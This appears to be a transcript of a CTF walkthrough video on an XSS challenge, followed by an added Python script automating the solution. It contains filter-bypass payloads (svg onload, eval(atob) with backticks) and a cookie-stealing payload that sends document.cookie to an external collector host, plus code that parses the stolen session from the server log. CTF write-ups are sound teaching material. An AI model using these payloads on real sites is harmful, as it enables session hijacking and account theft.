Hello everybody, welcome back to the YouTube video showcasing the Army Cyberstakes, or ACI CTF, that was going on this past week. I've been wanting to showcase some of these cool challenges; there were a ton of fantastic ones. I'm trying to get a lot of the tougher ones, at least some of the more complex ones that I had solved, out of the way now before I burn out trying to record all this stuff. This challenge is called "I've Caught You Now." It's worth 250 points. Currently it's Friday and the competition ends on Sunday, so there might be a few more solves, but at the time of recording there are only 43 solves for this challenge. It says: XSS, or Cross-Site Scripting, is a thing of the past. Read all about it here. And we're given a link.

So I will open that up in a web browser. It took a little bit to render that page, which is weird. But this is the Cyber Times web page. It says there are five cool ways to protect your websites from hackers. This looks kind of like a blog. Featured posts: "You Will Never Believe This Flag We Found." It says "When going head first in CTF, everyone wants to find..." blah, blah, blah, flags, and "help us out, so make cool content for us." Okay, so if I were to click on one of these, I'll go to article zero here. It says "To fight back, these companies deploy applications called a web application..." and then an ellipsis. It says you're out of free articles; please use an account with a Cyber Times subscription to read this article. So if I try to click on any of these links here, "search for security," or "hacking," "exploit," "cyber crime," "firewall," "CTF," it looks like they're all modifying this search URL here. /search is the location that it's trying to go to, with an argument, an HTTP GET variable that's passed in, search, and what we're actually looking for.
So going back to the page, though, this featured post here, article one: as the link says, "You'll never believe this flag we found. We figured out one challenge; you won't believe the flag we got. Find out below." Okay, so that must be maybe where a flag could be hidden. But we do not have access to read that page. There is a "Submit cool content to us" location: "Send us links to cool content. We'll see if it is newsworthy." Like, I suppose we could give them a URL.

So based off of everything that we've learned, it looks like there are web pages, there are blogs on the site, there's a location that we could submit a URL to visit, and we aren't able to access some of the pages and some of the content on this website. Given the challenge description, I'm assuming this is going to be a cross-site scripting attack where we need to be able to drive whoever validates or checks that submission page to review and access some of these pages that we cannot access. So where could we control, or where do we have an input that we could modify and make it do something? Sounds like we could at least kind of offer some input into the search blog functionality. And the page is moving slowly for me. So why is that? I'll pause and see if it comes back. Okay, now it seems to be stable. But if I were to search for something like the letter "a," or "please subscribe," it looks like it renders it out on the page. So maybe we could do some things to actually get some cross-site scripting in there, render some HTML. Okay, that <h1> doesn't seem to load for me. So that kind of takes away some of the wind that we had. But what else could we do? "<h1>anything"... that's so weird that it does that. We could search for, like, an image tag maybe. If we do <img src=""> ... oh, okay, it says this page has been blocked by Secure WAF. And this is still on the web page; this isn't our browser trying to tell us something.
It says Secure WAF detected that the URL parameter "search" contains dangerous data, so this web request has been blocked for your protection. Okay, so that must have triggered with the <img src> thing. Is it just the image tag that makes it whine? Yeah, so <img, <im... is that going to load for me? Okay, so "im" works. It's just searching for "img" with an opening angle bracket, and it'll whine for me: Secure WAF detected URL parameter "search" contains dangerous data. It's weird, though, because it includes the URL parameter itself in its response. So if I did something strange with a URL parameter, does it have to be "search" that has the weirdness, or could it be... could I also include something in here like <img src= maybe? Could I do that? Or I'll just use the image tag itself; that seems to break it. Okay. Could I use that <h1> tag that I just tried earlier? <h1>Hello... encode part of the URL. Oh, okay. Oh, it encoded that, saying that allowed my bad <h1>. As the encode... that seems to do its own injection, which is kind of peculiar.

Well, let's start to script this. Let's start to hammer this in a way that we could work with it and kind of be able to monitor and see everything that's happening. What is the name of this challenge again? "I've Caught You Now," so make a directory, "I have caught you now." Let's hop over in there and let's start to script this with Python. I have all of the other tabs open from some previous videos I've been recording; I'm trying to get a lot of these out for you guys. So let's import requests. Let's get this URL; let's say url equals just the base URL. I don't need "search" in here. So let's do a requests.get(url); I'll say r equals that. I'll print out r.text. And now let's try and run that. Okay, so it returns that out for us. To make things a little bit easier to see and work with, I'm going to use Shift+Alt+2 to get a second tab or pane within Sublime Text.
And then when I run this, I have BuildView as a plugin set up; you could install the package BuildView (Ctrl+Shift+P to access that). And I will go ahead and mark this page as HTML, so it's a little bit easier to read for us. So let's try and trigger that bad page again. Let's say our parameters can equal a dictionary with something, "<h1>anything" (that we just tried earlier), set to "<img". So this is funky, because the parameter name itself is where we can get our cross-site scripting kind of injection in, but the value is what is being used to trigger that WAF, or web application firewall. The web application firewall has actually made it insecure in itself, because it is vulnerable to cross-site scripting. So the value of this HTTP variable, this GET variable, is what's going to trigger the page, but then using the parameter name itself, we can inject that into the page. So I'll specify params=parameters. We should just call that variable params so it makes more sense, I guess. So let's spit that out. It says: Okay, this page has been blocked by Secure WAF. Secure WAF detected URL parameter <code><h1>anything... being properly rendered. We know that because there aren't any, like, &lt; or &gt;, no HTML-escaped sequences, in there. ...contains dangerous data, so this request has been blocked for your protection.

Okay, so it looks like our XSS payload... let's make a variable for that. Our XSS payload could be... let's use a long string in Python; I wonder if that'll let us do some things. So <h1>anything. And what I actually want to do is print out the URL of this page so I can interact with it more, so r.url, or I can see in my browser how this actually loads. So we'll copy that in, slap it in. And okay, it looks like that renders just fine. This is currently trapped inside of a code block, so let me try and end that code block.
And then it tries to have another one. So it tries to close its original code block, so I guess I'll add a new one in there just so the page doesn't do weird things. Now let's try to do some of our <img src= nonsense. I can use double quotes because we're inside of these triple quotes in Python. So if I have that and I do a little onerror="javascript:alert(1+1)"... so we know that it evaluates... that gets the forbidden. Okay, so it seems sensitive on this image tag. I didn't try just a straight script. So we could try <script>alert(1+2)</script>. It doesn't matter; it also gets a forbidden. Okay. But our <h1> went through. That's weird. What can we get through? Hmm. Let's go to PayloadsAllTheThings. Let's go check out some of their options and ideas for cross-site scripting or XSS injection. Looks like they have a few options. So typically a classic cross-site scripting technique would grab a cookie, document.cookie, from the end user. Maybe we could get that to work eventually. But we can't seem to use these script tags. What else could we do? Can't use <script>, can't use </script>. Oh, the internal one... maybe it's replacing it. No, that's weird. So <img> also makes it whine. Does <svg onload> let it work? Can we try an SVG payload? Let's try one of those; spit that in. The page is taking a little bit of time to come back. Oh, okay, there he goes: <code><svg onload=alert('XSS')>. What did it do to my quotes? How come my single quotes aren't in there? Does this actually happen on the web page? Oh no, it does not; it does not run that alert. But it does a weird thing, getting an SVG in there. Okay, if I use the 1+2, does that actually trigger it? That does. Okay. So we have JavaScript, somehow, some way, but we can't seem to use quotes. The single quote didn't work. Will a double quote work? No. That is also being scraped out. Okay. What are our options? What can we do to get a string?
"XSS or JavaScript string without quotes." I feel like that's just a shot in the dark, but "can you create a JavaScript string without single quotes or double quotes?" Blah, blah, blah. "I've had to create strings without quotes for a product as well; we're delivering executable things." So they use String, and they use forward slashes to get a string. Does that work? Or we could do it just from the numbers. Let's try both of those. Let's use String, this guy here: "This contains no quotes." Let's try that. Copy that guy in: "This contains no quotes." Oh, but it also removed our spaces. What the heck? So the string showed up; we don't have spaces. That's going to be annoying. We could get spaces in there if we were to use that String.fromCharCode syntax. Let's try him. Paste that in as our little alert payload. Run that. Copy him. Put that on that page. That also doesn't work. Why not? alert(String... oh, it removes the periods. Oh my gosh. How are we going to be able to do a document.location if we don't have periods, or the dots we can actually use? Dang.

Okay, well, we at least learned a little bit of something: we could use strings if we use these forward slashes. Does this cover anything else? No, that's all that's in that page. "I want to remove double quotes from string"... that doesn't work. Oh, they use that here in PayloadsAllTheThings: alert with backticks. Does that work? Can we use backticks as a string? Hmm. Well, maybe we could still... well, can we use those? How could we escape this whole syntax without using periods and spaces? alert... eval. eval might let us do some stuff. Oh, oh, oh, and we could probably, like, base64-encode JavaScript. So I always forget this function. If you go into the console and you were to try and run, like, atob... what is atob and btoa? Those can get something into and out of base64. So, please sub... okay, btoa is to get it into base64, and atob is to decode from base64. Yeah.
Okay, so let's try to get another actual payload. So let's say stager can actually equal this, and let's get a real payload that can be another multi-line string, and let's do alert("Hello. This is me.") or whatever. It doesn't matter, as long as we have something with spaces and quotes. We could eval the atob... that's the one that we just determined was right. That btoa... yeah, so atob is what we need. And then if we use the forward slashes, will that work? Will forward slashes work? Let's go ahead and base64-encode: import base64, base64.b64encode(payload), and let's set the payload to equal that. So now it is base64-encoded. And let me... I think I'm in Python 2 again, because of the stupid Sublime Text. We'll just splice that in with the percent sign. Does that work? Oh, the page took it. Spit that in. No: "unexpected token." That thing... do I have too many parentheses? "Unexpected token: closing parenthesis." Could I use the backticks that I saw as a technique? Oh, that worked. Okay. Oh, so that would essentially give us, like, everything that we need, because now we're not working out of the original filter. So we could use spaces, we could use quotes, we could probably even use periods. So now we have unfiltered JavaScript, and we could perform a real cross-site scripting attack. Okay, that is progress.

So what do we need to do? Well, let's try and get someone's cookie. Let's spin up a little server that could be accessible from the internet, so a public box. Let's just make a directory for XSS; random name, doesn't matter. python -m... specify python3... on port 8888. So that guy should exist. He does. Great, I see my request. Let's spin him up one more time. And let's try and modify our script to go to document.location: http://johnhammond.org:8888, with 8888 as the port, and let's include document.cookie. Does that work for us?
Does he have a cookie? If I run this, I'll see myself go, if I try and go to this location. Let me try that. I'll spin this up. I'll close out of this debugger here. Let's paste that in. Okay, so that carried me over: "error response, file not found," whatever; it doesn't need a file, but it got all of the cookies that I had. So my PHP session is in there. If I were to go submit that... okay, stop, I don't need that anymore. Bring me back to the original server, please. Yeah, fine. Spin that up one more time. And let's make sure you guys can see that without my face being in the way. Go ahead and submit that URL to the validator, or whoever's going to check that. "Thanks. We'll check it out in a few minutes. Please give us some time before trying again." Okay, let's see if we ever get a request from him. We do, we do: we get a session. Oh, perfect. Okay. And that must be the cookie. So I'm going to use my EditThisCookie manager. Let's search cookies for here. Can I add a new one? Can I add a new cookie, please? Whatever. Let's not do it in the browser. Let's just use Python, the magic that we know within Python. So now let's just call this, like, catch_cookie.py, and let's save a different one to be, like, get_flag.py. So we know that the session value looks like this, because we just caught that with our JavaScript cross-site scripting cookie catcher. So what we could do is use requests (holy crap) to get this URL. Let's say my cookies equals session set to that, with a key and value pair. Let's say cookies=cookies, and let's just load the page, print it out, r.text. Holy cow. And okay, it reads it just fine. So can I get to that article one page? That's the one that says it has a flag in it. So let's get url plus article one and spit that guy out. Oh yeah. Okay, awesome, awesome. "When going head first in CTFs, everyone wants to come out with some cool flag. After a truckload of effort, we were rewarded with the text ACI..."
So there's our flag. That's it. That's what we did; that's how we solve it. That's fantastic. So that was kind of cool. I hope you guys really liked that challenge: the little cookie catch, needing to do some clever cross-site scripting stuff. If you had tinkered around with this for more... I actually did; I spent a lot of time, I think I spent like a couple hours on this one. I didn't end up using SVG originally; I actually did a <body onload>, and I would use a newline to get my spaces in there. And I was even, like, changing the whole URL, or the CSS in that page. I'd be like, I verify, what can I actually read in? Can I make the background red? How many characters can I use? And I would slowly figure out, okay, these are the filters that are beating me up, and how I needed to get around them. So that eval/base64 technique is really what I used to get out of the filter and be able to use strings, periods, double quotes and single quotes, whatever I really needed to. And I staged it all with Python and just grabbed the URL so I could kind of go back and forth between troubleshooting how it looks on the page and how it's going to actually render that JavaScript in my browser. So that's that. That was that challenge. But boy, I hope that was cool. I hope you guys learned a little bit of some tricks in there for cross-site scripting. You could also do a little XMLHttpRequest, or XHR. That's even the solution that I had. I'll go find and show you my script. I don't know why I'm still talking about this like I'm not going to show you. What is the name of this challenge? Why do I forget every single time? "I've Caught You Now," that's what it is. ape.py. Yeah, I actually used XHR to go ahead and grab the article and then send it to myself. I would use document.location after, but getting the cookie will work just as well, because you're going to act as that user. So you can see the style sheets that I was saying I did crazy stuff with. That's it.
But some people might have run into the issue where you're getting a CORS error, or a cross-origin policy, or like you have to be remaining on the website itself; you can't request out to an external site with XHR. That's correct. So when we were doing document.location, document.location will not have that CORS problem. But if you were to use XHR, or a new XMLHttpRequest, to reach out to your external server where you're going to grab the flag from, well, then it's going to say, hey, you're not allowed to leave the site, or the cross-origin policy is just not letting it have that. So don't use... do use document.location; you've got to use document.location to go ahead and grab that cookie or grab the text that you really want to end up seeing. So that's that. XMLHttpRequest is kind of cool, because you can do a lot of drive-by downloading and access any other page that you want. But if you are catching something externally, if you're sending something externally, you'd have to use document.location in this case. At least that's what I've seen. I'm happy to hear if you guys got anything else. But that was that challenge. Wow. Wow. Thank you guys so much for watching. I hope you guys enjoyed this video. I hope you learned something cool, some neat tricks with cross-site scripting; a lot of good resources out there between PayloadsAllTheThings and just some quick Googling and researching, just trying to do clever tricks and techniques. So if you liked this video, please do hit that like button. If you didn't like it, hit the dislike button twice so I know how much you hated it. Leave a comment, type some things in the box and hit the enter key, YouTube algorithm stuff. Please don't hesitate to subscribe, hit that bell icon. I don't know why you would ever hit a bell, personally. What did it do to you? But hey, I hate doing it. I'm so bad at outros. Just get off the video. See you on LinkedIn, Twitter, Facebook, Discord, Patreon, etc.
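The staging trick from the walkthrough, put together as an added Python example. This is not the challenge's code and not the author's catch_cookie.py, get_flag.py or ape.py scripts. It assumes the filter behaviour described above: quotes, spaces and periods are stripped from the reflected parameter name, while backticks, parentheses, slashes and the base64 alphabet survive, and the parameter value only has to trip the WAF (here "<img") so that the block page reflects the parameter name unescaped. The collector hostname, the site hostname and the access-log line are constructed placeholders, and the cookie-jar parser assumes the collector is a plain "python -m http.server" whose log is the only record of the callback.

```python
import base64
import re
from urllib.parse import urlencode, unquote, urlsplit

# Characters the walkthrough observed being stripped from the reflected
# parameter name. Assumption: this is the whole set; backticks and
# parentheses were seen to survive, so they are usable in the outer payload.
STRIPPED = set("'\" .")


def stage(js: str) -> str:
    """Wrap arbitrary JavaScript in eval(atob(`...`)).

    The outer payload contains no quote, space or period; the real code
    (which may use all of them) rides inside the base64 blob and is only
    decoded once it runs in the victim's browser.
    """
    b64 = base64.b64encode(js.encode()).decode()
    return f"eval(atob(`{b64}`))"


def survives_filter(payload: str) -> bool:
    """True if the payload contains none of the characters the filter removes."""
    return not (set(payload) & STRIPPED)


def injection_param(stager: str) -> str:
    """The parameter NAME carries the HTML; the value is only there to trip the WAF."""
    return f"<svg onload={stager}>"


def build_xss_url(base: str, stager: str, waf_trigger: str = "<img") -> str:
    """URL to hand to the 'submit cool content' reviewer (assumed /search endpoint)."""
    return f"{base}/search?{urlencode({injection_param(stager): waf_trigger})}"


def cookie_stealer(collector: str) -> str:
    """Exfiltrate by navigation: document.location is a top-level request,
    so the cross-origin restriction that blocks reading an XHR response
    cross-origin does not apply."""
    return f'document.location = "{collector}/?" + document.cookie'


# Constructed log line in the shape python -m http.server prints when the
# reviewer's browser follows the injected document.location.
SESSION_LOG_LINE = (
    '203.0.113.5 - - [11/Dec/2020 14:02:11] '
    '"GET /?session=0123456789abcdef;%20theme=dark HTTP/1.1" 404 -'
)


def extract_cookies(log_line: str) -> dict:
    """Pull the victim's cookie jar back out of the collector's access log.

    document.cookie is "k=v; k2=v2", so the query string is NOT a normal
    key=value&key=value form; split on ';' instead of using parse_qs.
    """
    m = re.search(r'"GET (\S*) HTTP', log_line)
    if not m:
        return {}
    query = unquote(urlsplit(m.group(1)).query)
    jar = {}
    for pair in query.split(";"):
        if "=" in pair:
            key, value = pair.strip().split("=", 1)
            jar[key] = value
    return jar


if __name__ == "__main__":
    stager = stage(cookie_stealer("http://collector.example:8888"))
    assert survives_filter(stager)
    print(build_xss_url("http://cybertimes.example", stager))
    print(extract_cookies(SESSION_LOG_LINE))
    # With the stolen jar, the subscriber-only article is a normal fetch:
    #   requests.get(base + "/article/1", cookies=extract_cookies(line))
```

The split between stage() and survives_filter() is the point: write the real payload with whatever characters you like, then check only the outer stager against the stripped set before submitting, so the decision about what the filter will mangle is made once, in code, instead of by eyeballing the reflected page.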